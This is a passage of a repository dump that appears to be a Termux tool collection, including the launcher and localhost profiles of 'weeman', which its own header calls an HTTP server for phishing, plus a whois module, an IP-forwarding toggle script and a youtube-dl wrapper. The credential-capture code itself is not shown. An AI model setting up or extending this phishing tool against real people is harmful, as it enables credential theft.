12 | 
13 | # Module global configs
14 | MODULE_AUTHOR = "Hypsurus <hypsurus@mail.ru>"
15 | MODULE_LICENSE = "GPLv3"
16 | MODULE_VERSION = "0.1"
17 | MODULE_DATE = "18-12-2015"
18 | # Keep it short
19 | MODULE_DE   = "WHO-IS IP."
20 | 
21 | class whois(object):
22 |     """ Get links from HTML page """
23 |     def __init__(self, ip_addr):
24 |         self.ip_addr = ip_addr
25 | 
26 |     def fetch(self):
27 |         """ Create connection o the whois server """
28 |         s = socket(AF_INET, SOCK_STREAM)
29 |         code = s.connect_ex(("whois.ripe.net", 43))
30 |         s.settimeout(2)
31 |         if code != 0:
32 |             printt(3, "Failed to connect to the whois server.")
33 |             return
34 | 
35 |         data = s.recv(1024)
36 |         print(data)
37 |         s.send("%s -B\r\n" % (self.ip_addr) )
38 |         while data:
39 |             data = s.recv(8192)
40 |             print(data)
41 |         s.close()
42 | 
43 | def main(args):
44 |     try:
45 |         ip_addr = args[2]
46 |     except IndexError:
47 |         print("Usage: whois_ip [IP].")
48 |         return # Exit main()
49 | 
50 |     run = whois(ip_addr)
51 |     run.fetch()
52 | 


--------------------------------------------------------------------------------
/weeman/profiles/0.txt:
--------------------------------------------------------------------------------
1 | https://github.com/GottModusTermux/
2 | 


--------------------------------------------------------------------------------
/weeman/profiles/localhost.profile:
--------------------------------------------------------------------------------
 1 | #
 2 | # Default weeman profile
 3 | #
 4 | 
 5 | # Website URL
 6 | url = https://localhost
 7 | 
 8 | # <from action>
 9 | action_url = https://localhost
10 | 
11 | # The port weeman will listen
12 | port = 80
13 | 
14 | # HTTP User-Agent
15 | user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
16 | 
17 | # HTML file to load instead of URL
18 | # html_file = "file.html"
19 | 


--------------------------------------------------------------------------------
/weeman/profiles/mobile_localhost.profile:
--------------------------------------------------------------------------------
 1 | #
 2 | # Weeman profile for mobile site.
 3 | #
 4 | 
 5 | # Website URL
 6 | url = "https://localhost"
 7 | 
 8 | # <from action>
 9 | action_url = "https://localhost"
10 | 
11 | # The port weeman will listen
12 | port = 80
13 | 
14 | # HTTP User-Agent
15 | user_agent = "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+"
16 | 
17 | # HTML file to load
18 | # html_file = "file.html"
19 | 


--------------------------------------------------------------------------------
/weeman/tools/0.txt:
--------------------------------------------------------------------------------
1 | https://github.com/GottModusTermux/
2 | 


--------------------------------------------------------------------------------
/weeman/tools/switch_ip_forward.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # switch_ip_forward.sh - enable/disable ip forward
 4 | #
 5 | # Written by Hypsurus (c) 2016
 6 | #
 7 | # See 'LICENSE' file for copying
 8 | #
 9 | 
10 | 
11 | switch() {
12 | 	if [ $1 -eq 1 ];then
13 | 		echo "> Enabling ip forward ..."
14 | 		echo 1 > "/proc/sys/net/ipv4/ip_forward"
15 | 		if [ $(cat /proc/sys/net/ipv4/ip_forward) -eq 1 ];then
16 | 			echo "> IP forward enabled."
17 | 		else
18 | 			echo "(X) IP forward not enabled."
19 | 		fi
20 | 	elif [ $1 -eq 0 ];then
21 | 		echo "> Disabling ip forward ..."
22 | 		echo 0 > "/proc/sys/net/ipv4/ip_forward"
23 | 		if [ $(cat /proc/sys/net/ipv4/ip_forward) -eq 0 ];then
24 | 			echo "> IP forward disabled."
25 | 		else
26 | 			echo "(X) IP forward not disabled."
27 | 		fi
28 | 	fi
29 | }
30 | 
31 | 
32 | if [ $UID -ne 0 ];then
33 | 	echo "Please run as root."
34 | 	exit 1
35 | fi
36 | 
37 | if [[ $1 == "-e" ]] || [[ $1 == "--enable" ]];then
38 | 	switch 1
39 | elif [[ $1 == "-d" ]] || [[ $1 == "--disable" ]];then
40 | 	switch 0
41 | else
42 | 	echo "Usage: $0 --enable/--disable."
43 | 	echo -e "\nOptions:"
44 | 	echo -e "\t-e/--enable  - enable ip forward."
45 | 	echo -e "\t-d/--disable - disable ip forward."
46 | 	exit 1
47 | fi
48 | 


--------------------------------------------------------------------------------
/weeman/weeman.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | #
 3 | # weeman.py - HTTP server for phishing
 4 | #
 5 | #  Weeman is free software; you can redistribute it and/or modify
 6 | #  it under the terms of the GNU General Public License as published by
 7 | #  the Free Software Foundation; either version 2 of the License, or
 8 | #  (at your option) any later version.
 9 | #
10 | #  Weeman is distributed in the hope that it will be useful,
11 | #  but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
13 | #  GNU General Public License for more details.
14 | #
15 | #  You should have received a copy of the GNU General Public License
16 | #  along with this program.  If not, see <http://www.gnu.org/licenses/>.
17 | #
18 | # Copyright (C) 2015 Hypsurus <hypsurus@mail.ru>
19 | #
20 | 
21 | import sys
22 | import optparse
23 | from core.misc import printt
24 | from core.config import user_agent as usera
25 | 
26 | def tests_pyver():
27 |     if sys.version[:3] == "2.7" or "2" in sys.version[:3]:
28 |         pass # All good
29 |     elif "3" in sys.version[:3]:
30 |         printt(1,"Weeman has no support for Python 3.")
31 |     else:
32 |         printt(1, "Your Python version is very old ..")
33 | 
34 | def tests_platform():
35 |     if "linux" in sys.platform:
36 |         #printt(3, "Running Weeman on linux ... (All good)")
37 |         pass
38 |     elif "darwin" in sys.platform:
39 |         #printt(3, "Running Weeman on \'Mac\' (All good)")
40 |         pass
41 |     elif "win" in sys.platform:
42 |         print("Sorry, there is no support for windows right now.")
43 |         sys.exit(1)
44 |     else:
45 |         printt(3, "If \'Weeman\' runs sucsessfuly on your platform %s\nPlease let me (@Hypsurus) know!" %sys.platform)
46 | 
47 | def main():
48 |     tests_pyver()
49 |     tests_platform()
50 |     parser = optparse.OptionParser()
51 |     parser.add_option("-q", "--quiet", dest="quiet_mode_opt", action="store_true", default=False, help="Runs without displaying the banner.")
52 |     parser.add_option("-p", "--profile", dest="profile", help="Load weeman profile.")
53 |     options,r = parser.parse_args()
54 | 
55 |     if options.profile:
56 |         from core.shell import shell_noint
57 |         shell_noint(options.profile)
58 |     else:
59 |         from core.shell import shell
60 |         shell()
61 | 
62 | if __name__ == '__main__':
63 |     main()
64 | 


--------------------------------------------------------------------------------
/yotube Copie all to script.md:
--------------------------------------------------------------------------------
 1 | #!/data/data/com.termux/files/usr/bin/bash
 2 | # © 2017 Mayur BeingAllRounder
 3 | 
 4 | echo "© 2017 Mayur BeingAllRounder"
 5 | echo "Audio only press 1"
 6 | echo "144p Video press 2"
 7 | echo "240p Video press 3"
 8 | echo "360p Video press 4"
 9 | echo "480p Video press 5"
10 | echo "720p Video press 6"
11 | echo "1080p Video press 7"
12 | echo "2k Video press 8"
13 | echo "4k Video press 9"
14 | 
15 | command='-no-mtime -o /data/data/com.termux/files/home/storage/shared/youtube/%(title)s.%(ext)s -f'
16 | read option
17 | 
18 | if [ "$option" -eq "1" ]
19 | then
20 |     echo "$command 140" > ~/.config/youtube-dl/config
21 |     youtube-dl $1
22 | 
23 | elif [ "$option" -eq "2" ]
24 | then
25 |     echo "$command \"best[height<=144]\"" > ~/.config/youtube-dl/config
26 |     youtube-dl $1
27 | 
28 | elif [ "$option" -eq "3" ]
29 | then
30 |     echo "$command \"best[height<=240]\"" > ~/.config/youtube-dl/config
31 |     youtube-dl $1
32 | 
33 | elif [ "$option" -eq "4" ]
34 | then
35 |     echo "$command \"best[height<=360]\"" > ~/.config/youtube-dl/config
36 |     youtube-dl $1
37 | 
38 | elif [ "$option" -eq "5" ]
39 | then
40 |     echo "$command \"best[height<=480]\"" > ~/.config/youtube-dl/config
41 |     youtube-dl $1
42 | 
43 | elif [ "$option" -eq "6" ]
44 | then
45 |     echo "$command \"best[height<=720]\"" > ~/.config/youtube-dl/config
46 |     youtube-dl $1
47 | 
48 | elif [ "$option" -eq "7" ]
49 | then
50 |     echo "$command \"best[height<=1080]\"" > ~/.config/youtube-dl/config
51 |     youtube-dl $1
52 | 
53 | elif [ "$option" -eq "8" ]
54 | then
55 |     echo "$command \"best[height<=1440]\"" > ~/.config/youtube-dl/config
56 |     youtube-dl $1
57 | 
58 | elif [ "$option" -eq "9" ]
59 | then
60 |     echo "$command \"best[height<=2160]\"" > ~/.config/youtube-dl/config
61 |     youtube-dl $1
62 | fi
63 | 


--------------------------------------------------------------------------------